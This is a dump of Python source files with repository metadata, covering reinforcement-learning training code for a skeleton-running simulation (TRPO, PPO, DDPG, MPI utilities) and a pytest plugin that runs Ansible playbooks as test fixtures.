"text": "import os, subprocess, sys\n\n\ndef mpi_fork(n, bind_to_core=False):\n \"\"\"Re-launches the current script with workers\n Returns \"parent\" for original parent, \"child\" for MPI children\n \"\"\"\n if n <= 1:\n return \"child\"\n if os.getenv(\"IN_MPI\") is None:\n env = os.environ.copy()\n env.update(\n MKL_NUM_THREADS=\"1\",\n OMP_NUM_THREADS=\"1\",\n IN_MPI=\"1\"\n )\n args = [\"mpirun\", \"-np\", str(n)]\n if bind_to_core:\n args += [\"-bind-to\", \"core\"]\n args += [sys.executable] + sys.argv\n subprocess.check_call(args, env=env)\n return \"parent\"\n else:\n return \"child\"\n"
},
{
"alpha_fraction": 0.5974025726318359,
"alphanum_fraction": 0.6020408272743225,
"avg_line_length": 33.22222137451172,
"blob_id": "f153dcd5bafed1e02d0f501a7c6b6043e4b4862d",
"content_id": "85b5e55e8d82f66b61e6d6e2197885601542bf11",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2156,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 63,
"path": "/baselines/baselines_common/dataset.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\n\nclass Dataset(object):\n def __init__(self, data_map, deterministic=False, shuffle=True):\n self.data_map = data_map\n self.deterministic = deterministic\n self.enable_shuffle = shuffle\n self.n = next(iter(data_map.values())).shape[0]\n self._next_id = 0\n self.shuffle()\n\n def shuffle(self):\n if self.deterministic:\n return\n perm = np.arange(self.n)\n np.random.shuffle(perm)\n\n for key in self.data_map:\n self.data_map[key] = self.data_map[key][perm]\n\n self._next_id = 0\n\n def next_batch(self, batch_size):\n if self._next_id >= self.n and self.enable_shuffle:\n self.shuffle()\n\n cur_id = self._next_id\n cur_batch_size = min(batch_size, self.n - self._next_id)\n self._next_id += cur_batch_size\n\n data_map = dict()\n for key in self.data_map:\n data_map[key] = self.data_map[key][cur_id:cur_id + cur_batch_size]\n return data_map\n\n def iterate_once(self, batch_size):\n if self.enable_shuffle: self.shuffle()\n\n while self._next_id <= self.n - batch_size:\n yield self.next_batch(batch_size)\n self._next_id = 0\n\n def subset(self, num_elements, deterministic=True):\n data_map = dict()\n for key in self.data_map:\n data_map[key] = self.data_map[key][:num_elements]\n return Dataset(data_map, deterministic)\n\n\ndef iterbatches(arrays, *, num_batches=None, batch_size=None, shuffle=True,\n include_final_partial_batch=True):\n assert (num_batches is None) != (\n batch_size is None), 'Provide num_batches or batch_size, but not both'\n arrays = tuple(map(np.asarray, arrays))\n n = arrays[0].shape[0]\n assert all(a.shape[0] == n for a in arrays[1:])\n inds = np.arange(n)\n if shuffle: np.random.shuffle(inds)\n sections = np.arange(0, n, batch_size)[1:] if num_batches is None else num_batches\n for batch_inds in np.array_split(inds, sections):\n if include_final_partial_batch or len(batch_inds) == batch_size:\n yield tuple(a[batch_inds] for a in arrays)\n"
},
{
"alpha_fraction": 0.5273295044898987,
"alphanum_fraction": 0.5590838193893433,
"avg_line_length": 33.30356979370117,
"blob_id": "6691f216717acfe73fe12ba182fdb9fa2b530756",
"content_id": "8f45846f9d8d457a1771daeea95ab3f75050db4a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3842,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 112,
"path": "/baselines/baselines_common/mpi_running_mean_std.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "from mpi4py import MPI\nimport tensorflow as tf\nimport baselines.baselines_common.tf_util as U\nimport numpy as np\n\n\nclass RunningMeanStd(object):\n # https://en.wikipedia.org/wiki/Algorithms_for_calculating_variance#Parallel_algorithm\n def __init__(self, epsilon=1e-2, shape=()):\n self._sum = tf.get_variable(\n dtype=tf.float64,\n shape=shape,\n initializer=tf.constant_initializer(0.0),\n name=\"runningsum\", trainable=False)\n self._sumsq = tf.get_variable(\n dtype=tf.float64,\n shape=shape,\n initializer=tf.constant_initializer(epsilon),\n name=\"runningsumsq\", trainable=False)\n self._count = tf.get_variable(\n dtype=tf.float64,\n shape=(),\n initializer=tf.constant_initializer(epsilon),\n name=\"count\", trainable=False)\n self.shape = shape\n\n self.mean = tf.to_float(self._sum / self._count)\n self.std = tf.sqrt(\n tf.maximum(tf.to_float(self._sumsq / self._count) - tf.square(self.mean), 1e-2))\n\n newsum = tf.placeholder(shape=self.shape, dtype=tf.float64, name='sum')\n newsumsq = tf.placeholder(shape=self.shape, dtype=tf.float64, name='var')\n newcount = tf.placeholder(shape=[], dtype=tf.float64, name='count')\n self.incfiltparams = U.function([newsum, newsumsq, newcount], [],\n updates=[tf.assign_add(self._sum, newsum),\n tf.assign_add(self._sumsq, newsumsq),\n tf.assign_add(self._count, newcount)])\n\n def update(self, x):\n x = x.astype('float64')\n n = int(np.prod(self.shape))\n totalvec = np.zeros(n * 2 + 1, 'float64')\n addvec = np.concatenate([x.sum(axis=0).ravel(), np.square(x).sum(axis=0).ravel(),\n np.array([len(x)], dtype='float64')])\n MPI.COMM_WORLD.Allreduce(addvec, totalvec, op=MPI.SUM)\n self.incfiltparams(totalvec[0:n].reshape(self.shape), totalvec[n:2 * n].reshape(self.shape),\n totalvec[2 * n])\n\n\[email protected]_session\ndef test_runningmeanstd():\n for (x1, x2, x3) in [\n (np.random.randn(3), np.random.randn(4), np.random.randn(5)),\n (np.random.randn(3, 2), np.random.randn(4, 2), np.random.randn(5, 2)),\n ]:\n rms = RunningMeanStd(epsilon=0.0, shape=x1.shape[1:])\n U.initialize()\n\n x = np.concatenate([x1, x2, x3], axis=0)\n ms1 = [x.mean(axis=0), x.std(axis=0)]\n rms.update(x1)\n rms.update(x2)\n rms.update(x3)\n ms2 = U.eval([rms.mean, rms.std])\n\n assert np.allclose(ms1, ms2)\n\n\[email protected]_session\ndef test_dist():\n np.random.seed(0)\n p1, p2, p3 = (np.random.randn(3, 1), np.random.randn(4, 1), np.random.randn(5, 1))\n q1, q2, q3 = (np.random.randn(6, 1), np.random.randn(7, 1), np.random.randn(8, 1))\n\n # p1,p2,p3=(np.random.randn(3), np.random.randn(4), np.random.randn(5))\n # q1,q2,q3=(np.random.randn(6), np.random.randn(7), np.random.randn(8))\n\n comm = MPI.COMM_WORLD\n assert comm.Get_size() == 2\n if comm.Get_rank() == 0:\n x1, x2, x3 = p1, p2, p3\n elif comm.Get_rank() == 1:\n x1, x2, x3 = q1, q2, q3\n else:\n assert False\n\n rms = RunningMeanStd(epsilon=0.0, shape=(1,))\n U.initialize()\n\n rms.update(x1)\n rms.update(x2)\n rms.update(x3)\n\n bigvec = np.concatenate([p1, p2, p3, q1, q2, q3])\n\n def checkallclose(x, y):\n print(x, y)\n return np.allclose(x, y)\n\n assert checkallclose(\n bigvec.mean(axis=0),\n U.eval(rms.mean)\n )\n assert checkallclose(\n bigvec.std(axis=0),\n U.eval(rms.std)\n )\n\n\nif __name__ == \"__main__\":\n # Run with mpirun -np 2 python <filename>\n test_dist()\n"
},
{
"alpha_fraction": 0.5785785913467407,
"alphanum_fraction": 0.5923423171043396,
"avg_line_length": 27.748201370239258,
"blob_id": "2c3abd679e6e1d94375481603cd447898060a493",
"content_id": "80bf6961ebf7183450f36bdfa97241cd072b8e9e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3996,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 139,
"path": "/baselines/train.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# noinspection PyUnresolvedReferences\n\nimport os\nimport json\nimport argparse\nfrom mpi4py import MPI\n\nfrom common.misc_util import boolean_flag, str2params, create_if_need\nfrom common.misc_util import set_global_seeds\nfrom common.env_wrappers import create_env\n\nfrom baselines.nets import Actor\nfrom baselines import trpo, ppo\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\n '--agent',\n type=str,\n default=\"trpo\",\n choices=[\"trpo\", \"ppo\"],\n help='Which agent to use. (default: %(default)s)')\n\n parser.add_argument('--seed', type=int, default=42)\n parser.add_argument('--difficulty', type=int, default=2)\n parser.add_argument('--max-obstacles', type=int, default=3)\n\n parser.add_argument('--logdir', type=str, default=\"./logs\")\n\n boolean_flag(parser, \"baseline-wrapper\", default=False)\n parser.add_argument('--skip-frames', type=int, default=1)\n parser.add_argument('--reward-scale', type=float, default=1.)\n parser.add_argument('--fail-reward', type=float, default=0.0)\n\n parser.add_argument('--hid-size', type=int, default=64)\n parser.add_argument('--num-hid-layers', type=int, default=2)\n\n parser.add_argument('--gamma', type=float, default=0.96)\n\n parser.add_argument('--restore-args-from', type=str, default=None)\n parser.add_argument('--restore-actor-from', type=str, default=None)\n\n parser.add_argument(\n '--max-train-days',\n default=int(1e1),\n type=int)\n\n args = parser.parse_args()\n return args\n\n\ndef restore_params(args):\n with open(args.restore_args_from, \"r\") as fin:\n params = json.load(fin)\n\n del params[\"seed\"]\n del params[\"difficulty\"]\n del params[\"max_obstacles\"]\n\n del params[\"skip_frames\"]\n\n del params[\"restore_args_from\"]\n del params[\"restore_actor_from\"]\n\n for key, value in params.items():\n setattr(args, key, value)\n return args\n \n\ndef train(args):\n import baselines.baselines_common.tf_util as U\n\n sess = U.single_threaded_session()\n sess.__enter__()\n\n if args.restore_args_from is not None:\n args = restore_params(args)\n\n rank = MPI.COMM_WORLD.Get_rank()\n\n workerseed = args.seed + 241 * MPI.COMM_WORLD.Get_rank()\n set_global_seeds(workerseed)\n\n def policy_fn(name, ob_space, ac_space):\n return Actor(\n name=name,\n ob_space=ob_space, ac_space=ac_space,\n hid_size=args.hid_size, num_hid_layers=args.num_hid_layers,\n noise_type=args.noise_type)\n\n env = create_env(args)\n env.seed(workerseed)\n\n if rank == 0:\n create_if_need(args.logdir)\n with open(\"{}/args.json\".format(args.logdir), \"w\") as fout:\n json.dump(vars(args), fout, indent=4, ensure_ascii=False, sort_keys=True)\n\n try:\n args.thread = rank\n if args.agent == \"trpo\":\n trpo.learn(\n env, policy_fn, args,\n timesteps_per_batch=1024,\n gamma=args.gamma,\n lam=0.98,\n max_kl=0.01,\n cg_iters=10,\n cg_damping=0.1,\n vf_iters=5,\n vf_stepsize=1e-3)\n elif args.agent == \"ppo\":\n # optimal settings:\n # timesteps_per_batch = optim_epochs * optim_batchsize\n ppo.learn(\n env, policy_fn, args,\n timesteps_per_batch=256,\n gamma=args.gamma,\n lam=0.95,\n clip_param=0.2,\n entcoeff=0.0,\n optim_epochs=4,\n optim_stepsize=3e-4,\n optim_batchsize=64,\n schedule='constant')\n else:\n raise NotImplementedError\n except KeyboardInterrupt:\n print(\"closing envs...\")\n\n env.close()\n\n\nif __name__ == '__main__':\n args = parse_args()\n args.noise_type = \"gaussian\"\n train(args)\n"
},
{
"alpha_fraction": 0.6320474743843079,
"alphanum_fraction": 0.637982189655304,
"avg_line_length": 29.636363983154297,
"blob_id": "633905b3294cec13b80301eaa9af78b14cebe962",
"content_id": "d99051634a3282451f92e945b8e9af2a1c13332b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 674,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 22,
"path": "/common/logger.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "from tensorboardX import SummaryWriter\nimport logging\n\nlogger = logging.getLogger(__name__)\n\nclass Logger(object):\n def __init__(self, log_dir, vanilla_logger=logger, skip=False):\n self.writer = SummaryWriter(log_dir)\n self.info = vanilla_logger.info\n self.debug = vanilla_logger.debug\n self.warning = vanilla_logger.warning\n self.skip = skip\n\n def scalar_summary(self, tag, value, step):\n if self.skip:\n return\n self.writer.add_scalar(tag, value, step)\n\n def histo_summary(self, tag, values, step):\n if self.skip:\n return\n self.writer.add_histogram(tag, values, step, bins=1000)\n"
},
{
"alpha_fraction": 0.6155068278312683,
"alphanum_fraction": 0.6247219443321228,
"avg_line_length": 32.12631607055664,
"blob_id": "fb4d72873b4be379c21e983a22a6b1e563cacecf",
"content_id": "1c0c13905eaaba52a24747013356a4e02a31e9b9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3147,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 95,
"path": "/common/env_wrappers.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport gym\nfrom gym.spaces import Box\nfrom osim.env import RunEnv\n\nfrom common.state_transform import StateVelCentr\n\n\nclass DdpgWrapper(gym.Wrapper):\n def __init__(self, env, args):\n gym.Wrapper.__init__(self, env)\n self.state_transform = StateVelCentr(\n obstacles_mode='standard',\n exclude_centr=True,\n vel_states=[])\n self.observation_space = Box(-1000, 1000, self.state_transform.state_size)\n self.skip_frames = args.skip_frames\n self.reward_scale = args.reward_scale\n self.fail_reward = args.fail_reward\n # [-1, 1] <-> [0, 1]\n action_mean = .5\n action_std = .5\n self.normalize_action = lambda x: (x - action_mean) / action_std\n self.denormalize_action = lambda x: x * action_std + action_mean\n\n def reset(self, **kwargs):\n return self._reset(**kwargs)\n\n def _reset(self, **kwargs):\n observation = self.env.reset(**kwargs)\n self.env_step = 0\n self.state_transform.reset()\n observation, _ = self.state_transform.process(observation)\n observation = self.observation(observation)\n return observation\n\n def _step(self, action):\n action = self.denormalize_action(action)\n total_reward = 0.\n for _ in range(self.skip_frames):\n observation, reward, done, _ = self.env.step(action)\n observation, obst_rew = self.state_transform.process(observation)\n total_reward += reward + obst_rew\n self.env_step += 1\n if done:\n if self.env_step < 1000: # hardcoded\n total_reward += self.fail_reward\n break\n\n observation = self.observation(observation)\n total_reward *= self.reward_scale\n return observation, total_reward, done, None\n\n def observation(self, observation):\n return self._observation(observation)\n\n def _observation(self, observation):\n observation = np.array(observation, dtype=np.float32)\n return observation\n\n\ndef create_env(args):\n env = RunEnv(visualize=False, max_obstacles=args.max_obstacles)\n\n if hasattr(args, \"baseline_wrapper\") or hasattr(args, \"ddpg_wrapper\"):\n env = DdpgWrapper(env, args)\n\n return env\n\n\ndef create_observation_handler(args):\n\n if hasattr(args, \"baseline_wrapper\") or hasattr(args, \"ddpg_wrapper\"):\n state_transform = StateVelCentr(\n obstacles_mode='standard',\n exclude_centr=True,\n vel_states=[])\n\n def observation_handler(observation, previous_action=None):\n observation = np.array(observation, dtype=np.float32)\n observation, _ = state_transform.process(observation)\n return observation\n else:\n def observation_handler(observation, previous_action=None):\n observation = np.array(observation, dtype=np.float32)\n return observation\n\n return observation_handler\n\n\ndef create_action_handler(args):\n action_mean = .5\n action_std = .5\n action_handler = lambda x: x * action_std + action_mean\n return action_handler\n"
},
{
"alpha_fraction": 0.6225484013557434,
"alphanum_fraction": 0.6319335699081421,
"avg_line_length": 34.067508697509766,
"blob_id": "3274f9a65ac2e62fed07893150f4d73a7ad3b22a",
"content_id": "91a528115cac5c28838911b30c303c081274a2f4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8311,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 237,
"path": "/ddpg/train.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import argparse\nimport os\nimport json\nimport copy\nimport torch\nimport torch.multiprocessing as mp\nfrom multiprocessing import Value\n\nfrom common.misc_util import boolean_flag, str2params, create_if_need\nfrom common.env_wrappers import create_env\nfrom common.torch_util import activations, hard_update\n\nfrom ddpg.model import create_model, create_act_update_fns, train_multi_thread, \\\n train_single_thread, play_single_thread\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('--seed', type=int, default=42)\n parser.add_argument('--difficulty', type=int, default=2)\n parser.add_argument('--max-obstacles', type=int, default=3)\n\n parser.add_argument('--logdir', type=str, default=\"./logs\")\n parser.add_argument('--num-threads', type=int, default=1)\n parser.add_argument('--num-train-threads', type=int, default=1)\n\n boolean_flag(parser, \"ddpg-wrapper\", default=False)\n parser.add_argument('--skip-frames', type=int, default=1)\n parser.add_argument('--fail-reward', type=float, default=0.0)\n parser.add_argument('--reward-scale', type=float, default=1.)\n boolean_flag(parser, \"flip-state-action\", default=False)\n\n for agent in [\"actor\", \"critic\"]:\n parser.add_argument('--{}-layers'.format(agent), type=str, default=\"64-64\")\n parser.add_argument('--{}-activation'.format(agent), type=str, default=\"relu\")\n boolean_flag(parser, \"{}-layer-norm\".format(agent), default=False)\n boolean_flag(parser, \"{}-parameters-noise\".format(agent), default=False)\n boolean_flag(parser, \"{}-parameters-noise-factorised\".format(agent), default=False)\n\n parser.add_argument('--{}-lr'.format(agent), type=float, default=1e-3)\n parser.add_argument('--{}-lr-end'.format(agent), type=float, default=5e-5)\n\n parser.add_argument('--restore-{}-from'.format(agent), type=str, default=None)\n\n parser.add_argument('--gamma', type=float, default=0.96)\n parser.add_argument('--loss-type', type=str, default=\"quadric-linear\")\n parser.add_argument('--grad-clip', type=float, default=10.)\n\n parser.add_argument('--tau', default=0.01, type=float)\n\n parser.add_argument('--train-steps', type=int, default=int(1e4))\n parser.add_argument('--batch-size', type=int, default=256) # per worker\n\n parser.add_argument('--buffer-size', type=int, default=int(1e6))\n\n boolean_flag(parser, \"prioritized-replay\", default=False)\n parser.add_argument('--prioritized-replay-alpha', default=0.6, type=float)\n parser.add_argument('--prioritized-replay-beta0', default=0.4, type=float)\n\n parser.add_argument('--initial-epsilon', default=1., type=float)\n parser.add_argument('--final-epsilon', default=0.01, type=float)\n parser.add_argument('--max-episodes', default=int(1e4), type=int)\n parser.add_argument('--max-update-steps', default=int(5e6), type=int)\n parser.add_argument('--epsilon-cycle-len', default=int(2e2), type=int)\n\n parser.add_argument('--max-train-days', default=int(1e1), type=int)\n\n parser.add_argument('--rp-type', default=\"ornstein-uhlenbeck\", type=str)\n parser.add_argument('--rp-theta', default=0.15, type=float)\n parser.add_argument('--rp-sigma', default=0.2, type=float)\n parser.add_argument('--rp-sigma-min', default=0.15, type=float)\n parser.add_argument('--rp-mu', default=0.0, type=float)\n\n parser.add_argument('--clip-delta', type=int, default=10)\n parser.add_argument('--save-step', type=int, default=int(1e4))\n\n parser.add_argument('--restore-args-from', type=str, default=None)\n\n return parser.parse_args()\n\n\ndef restore_args(args):\n with open(args.restore_args_from, \"r\") as fin:\n params = json.load(fin)\n\n del params[\"seed\"]\n del params[\"difficulty\"]\n del params[\"max_obstacles\"]\n\n del params[\"logdir\"]\n del params[\"num_threads\"]\n del params[\"num_train_threads\"]\n\n del params[\"skip_frames\"]\n\n for agent in [\"actor\", \"critic\"]:\n del params[\"{}_lr\".format(agent)]\n del params[\"{}_lr_end\".format(agent)]\n del params[\"restore_{}_from\".format(agent)]\n\n del params[\"grad_clip\"]\n\n del params[\"tau\"]\n\n del params[\"train_steps\"]\n del params[\"batch_size\"]\n\n del params[\"buffer_size\"]\n\n del params[\"prioritized_replay\"]\n del params[\"prioritized_replay_alpha\"]\n del params[\"prioritized_replay_beta0\"]\n\n del params[\"initial_epsilon\"]\n del params[\"final_epsilon\"]\n del params[\"max_episodes\"]\n del params[\"max_update_steps\"]\n del params[\"epsilon_cycle_len\"]\n\n del params[\"max_train_days\"]\n\n del params[\"rp_type\"]\n del params[\"rp_theta\"]\n del params[\"rp_sigma\"]\n del params[\"rp_sigma_min\"]\n del params[\"rp_mu\"]\n\n del params[\"clip_delta\"]\n del params[\"save_step\"]\n\n del params[\"restore_args_from\"]\n\n for key, value in params.items():\n setattr(args, key, value)\n return args\n\n\ndef train(args, model_fn, act_update_fns, multi_thread, train_single, play_single):\n create_if_need(args.logdir)\n\n if args.restore_args_from is not None:\n args = restore_args(args)\n\n with open(\"{}/args.json\".format(args.logdir), \"w\") as fout:\n json.dump(vars(args), fout, indent=4, ensure_ascii=False, sort_keys=True)\n\n env = create_env(args)\n\n if args.flip_state_action and hasattr(env, \"state_transform\"):\n args.flip_states = env.state_transform.flip_states\n args.batch_size = args.batch_size // 2\n\n args.n_action = env.action_space.shape[0]\n args.n_observation = env.observation_space.shape[0]\n\n args.actor_layers = str2params(args.actor_layers)\n args.critic_layers = str2params(args.critic_layers)\n\n args.actor_activation = activations[args.actor_activation]\n args.critic_activation = activations[args.critic_activation]\n\n actor, critic = model_fn(args)\n\n if args.restore_actor_from is not None:\n actor.load_state_dict(torch.load(args.restore_actor_from))\n if args.restore_critic_from is not None:\n critic.load_state_dict(torch.load(args.restore_critic_from))\n\n actor.train()\n critic.train()\n actor.share_memory()\n critic.share_memory()\n\n target_actor = copy.deepcopy(actor)\n target_critic = copy.deepcopy(critic)\n\n hard_update(target_actor, actor)\n hard_update(target_critic, critic)\n\n target_actor.train()\n target_critic.train()\n target_actor.share_memory()\n target_critic.share_memory()\n\n _, _, save_fn = act_update_fns(actor, critic, target_actor, target_critic, args)\n\n processes = []\n best_reward = Value(\"f\", 0.0)\n try:\n if args.num_threads == args.num_train_threads:\n for rank in range(args.num_threads):\n args.thread = rank\n p = mp.Process(\n target=multi_thread,\n args=(actor, critic, target_actor, target_critic, args, act_update_fns,\n best_reward))\n p.start()\n processes.append(p)\n else:\n global_episode = Value(\"i\", 0)\n global_update_step = Value(\"i\", 0)\n episodes_queue = mp.Queue()\n for rank in range(args.num_threads):\n args.thread = rank\n if rank < args.num_train_threads:\n p = mp.Process(\n target=train_single,\n args=(actor, critic, target_actor, target_critic, args, act_update_fns,\n global_episode, global_update_step, episodes_queue))\n else:\n p = mp.Process(\n target=play_single,\n args=(actor, critic, target_actor, target_critic, args, act_update_fns,\n global_episode, global_update_step, episodes_queue,\n best_reward))\n p.start()\n processes.append(p)\n\n for p in processes:\n p.join()\n except KeyboardInterrupt:\n pass\n\n save_fn()\n\n\nif __name__ == '__main__':\n os.environ['OMP_NUM_THREADS'] = '1'\n torch.set_num_threads(1)\n args = parse_args()\n train(args,\n create_model,\n create_act_update_fns,\n train_multi_thread,\n train_single_thread,\n play_single_thread)\n"
},
{
"alpha_fraction": 0.5262663960456848,
"alphanum_fraction": 0.5365853905677795,
"avg_line_length": 29.457143783569336,
"blob_id": "2f274c595a23ed0d9625597f1d3857b72f7af880",
"content_id": "3c4651a6b7d337584e5ab688cb844eaa317b9fd2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1066,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 35,
"path": "/baselines/baselines_common/mpi_saver.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "from mpi4py import MPI\nimport baselines.baselines_common.tf_util as U\nimport tensorflow as tf\n\n\nclass MpiSaver(object):\n def __init__(self, var_list=None, *,\n comm=None,\n log_prefix=\"/tmp\"):\n self.var_list = var_list\n self.t = 0\n\n self.saver = tf.train.Saver(\n var_list=var_list,\n max_to_keep=100,\n keep_checkpoint_every_n_hours=0.25,\n pad_step_number=True,\n save_relative_paths=True)\n self.log_prefix = log_prefix\n\n self.comm = MPI.COMM_WORLD if comm is None else comm\n\n def restore(self, restore_from=None):\n if restore_from is not None:\n self.saver.restore(U.get_session(), restore_from)\n self.t += int(restore_from.split(\"-\")[-1])\n self.sync()\n\n def sync(self):\n if self.comm.Get_rank() == 0: # this is root\n self.saver.save(\n U.get_session(),\n \"{}/model.ckpt\".format(self.log_prefix),\n global_step=self.t)\n self.t += 1\n"
}
] | 32 |
marbu/pytest-ansible-playbook
|
https://github.com/marbu/pytest-ansible-playbook
|
74172896ce89d7f17dce155f6e8f0a4192adde91
|
4a29fa61e4aceaead90e346a6fd0f04d83d593de
|
a39c0f07e6ffaf44ae2a3a5e68e6b9907da9eff0
|
refs/heads/master
| 2020-04-28T00:44:58.094346 | 2019-03-07T13:14:32 | 2019-03-07T13:14:32 | 174,827,526 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6437102556228638,
"alphanum_fraction": 0.64727783203125,
"avg_line_length": 33.11111068725586,
"blob_id": "a04157f504fab945061e47cd3bbc52ff80f71f0c",
"content_id": "97d887ffff15adf44479812c49a983dcbf95122a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6447,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 189,
"path": "/pytest_ansible_playbook.py",
"repo_name": "marbu/pytest-ansible-playbook",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nImplementation of pytest-ansible-playbook plugin.\n\"\"\"\n\n# Copyright 2016 Martin Bukatovič <[email protected]>\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nfrom __future__ import print_function\nimport os\nimport subprocess\nimport contextlib\n\nimport pytest\n\n\ndef pytest_addoption(parser):\n \"\"\"\n Define py.test command line options for this plugin.\n \"\"\"\n group = parser.getgroup('ansible-playbook')\n group.addoption(\n '--ansible-playbook-directory',\n action='store',\n dest='ansible_playbook_directory',\n metavar=\"PLAYBOOK_DIR\",\n help='Directory where ansible playbooks are stored.',\n )\n group.addoption(\n '--ansible-playbook-inventory',\n action='store',\n dest='ansible_playbook_inventory',\n metavar=\"INVENTORY_FILE\",\n help='Ansible inventory file.',\n )\n\n\ndef pytest_configure(config):\n \"\"\"\n Validate pytest-ansible-playbook options: when such option is used,\n the given file or directory should exist.\n\n This check makes the pytest fail immediately when wrong path is\n specified, without waiting for the first test case with ansible_playbook\n fixture to fail.\n \"\"\"\n dir_path = config.getvalue('ansible_playbook_directory')\n if dir_path is not None and not os.path.isdir(dir_path):\n msg = (\n \"value of --ansible-playbook-directory option ({0}) \"\n \"is not a directory\").format(dir_path)\n raise pytest.UsageError(msg)\n inventory_path = config.getvalue('ansible_playbook_inventory')\n if inventory_path is None:\n return\n if not os.path.isabs(inventory_path) and dir_path is not None:\n inventory_path = os.path.join(dir_path, inventory_path)\n if not os.path.isfile(inventory_path):\n msg = (\n \"value of --ansible-playbook-inventory option ({}) \"\n \"is not accessible\").format(inventory_path)\n raise pytest.UsageError(msg)\n\n\ndef get_ansible_cmd(inventory_file, playbook_file):\n \"\"\"\n Return process args list for ansible-playbook run.\n \"\"\"\n ansible_command = [\n \"ansible-playbook\",\n \"-vv\",\n \"-i\", inventory_file,\n playbook_file,\n ]\n return ansible_command\n\n\ndef get_empty_marker_error(marker_type):\n \"\"\"\n Generate error message for empty marker.\n \"\"\"\n msg = (\n \"no playbook is specified in \"\n \"``@pytest.mark.ansible_playbook_{0}`` decorator \"\n \"of this test case, please add at least one playbook \"\n \"file name as a parameter into the marker, eg. \"\n \"``@pytest.mark.ansible_playbook_{0}('playbook.yml')``\")\n return msg.format(marker_type)\n\n\[email protected]\ndef runner(\n request,\n setup_playbooks=None,\n teardown_playbooks=None,\n skip_teardown=False):\n \"\"\"\n Context manager which will run playbooks specified in it's arguments.\n\n :param request: pytest request object\n :param setup_playbooks: list of setup playbook names (optional)\n :param teardown_playbooks: list of setup playbook names (optional)\n :param skip_teardown:\n if True, teardown playbooks are not executed when test case fails\n\n It's expected to be used to build custom fixtures or to be used\n directly in a test case code.\n \"\"\"\n setup_playbooks = setup_playbooks or []\n teardown_playbooks = teardown_playbooks or []\n run_teardown = True\n # process request object\n directory = request.config.option.ansible_playbook_directory\n inventory = request.config.option.ansible_playbook_inventory\n # setup\n for playbook_file in setup_playbooks:\n subprocess.check_call(\n get_ansible_cmd(inventory, playbook_file),\n cwd=directory)\n try:\n yield\n except Exception as ex:\n if skip_teardown:\n run_teardown = False\n raise ex\n finally:\n if run_teardown:\n # teardown\n for playbook_file in teardown_playbooks:\n subprocess.check_call(\n get_ansible_cmd(inventory, playbook_file),\n cwd=directory)\n\n\[email protected]\ndef ansible_playbook(request):\n \"\"\"\n Pytest fixture which runs given ansible playbook. When ansible returns\n nonzero return code, the test case which uses this fixture is not\n executed and ends in ``ERROR`` state.\n \"\"\"\n setup_playbooks = []\n teardown_playbooks = []\n\n if hasattr(request.node, \"get_marker\"):\n marker = request.node.get_marker('ansible_playbook_setup')\n setup_ms = [marker] if marker is not None else []\n marker = request.node.get_marker('ansible_playbook_teardown')\n teardown_ms = [marker] if marker is not None else []\n else:\n # since pytest 4.0.0, markers api changed, see:\n # https://github.com/pytest-dev/pytest/pull/4564\n # https://docs.pytest.org/en/latest/mark.html#updating-code\n setup_ms = request.node.iter_markers('ansible_playbook_setup')\n teardown_ms = request.node.iter_markers('ansible_playbook_teardown')\n\n for marker in setup_ms:\n if len(marker.args) == 0:\n raise Exception(get_empty_marker_error(\"setup\"))\n setup_playbooks.extend(marker.args)\n for marker in teardown_ms:\n if len(marker.args) == 0:\n raise Exception(get_empty_marker_error(\"teardown\"))\n teardown_playbooks.extend(marker.args)\n\n if len(setup_playbooks) == 0 and len(teardown_playbooks) == 0:\n msg = (\n \"no ansible playbook is specified for the test case, \"\n \"please add a decorator like this one \"\n \"``@pytest.mark.ansible_playbook_setup('playbook.yml')`` \"\n \"or \"\n \"``@pytest.mark.ansible_playbook_teardown('playbook.yml')`` \"\n \"for ansible_playbook fixture to know which playbook to use\")\n raise Exception(msg)\n\n with runner(request, setup_playbooks, teardown_playbooks):\n yield\n"
}
